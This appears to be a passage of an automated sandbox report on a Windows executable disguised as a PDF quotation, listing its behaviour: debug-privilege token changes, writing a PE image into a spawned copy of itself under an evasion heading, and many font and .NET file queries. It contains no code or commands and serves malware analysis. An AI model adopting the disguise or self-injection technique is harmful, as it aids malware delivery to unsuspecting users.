                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeCode function: 4_2_05F34800 LdrInitializeThunk,4_2_05F34800
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeMemory allocated: page read and write | page guardJump to behavior

                    HIPS / PFW / Operating System Protection Evasion

                    barindex
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeMemory written: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe base: 400000 value starts with: 4D5AJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeProcess created: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe C:\Users\user\Desktop\Quotation-pdf______________________________________.exeJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeQueries volume information: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeQueries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeQueries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeQueries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeQueries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeQueries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeQueries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeQueries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeQueries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeQueries volume information: C:\Windows\Fonts\consola.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeQueries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeQueries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeQueries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeQueries volume information: C:\Windows\Fonts\seguisb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeQueries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeQueries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeQueries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeQueries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeQueries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeQueries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeQueries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformationJump to behavior
